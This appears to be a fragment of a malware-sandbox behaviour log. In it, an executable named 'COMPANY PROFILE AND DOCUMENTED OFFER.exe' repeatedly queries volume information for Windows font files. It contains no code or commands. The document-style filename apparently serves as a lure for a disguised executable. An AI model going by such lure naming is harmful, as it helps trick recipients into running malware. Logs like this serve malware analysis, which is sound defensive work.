Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
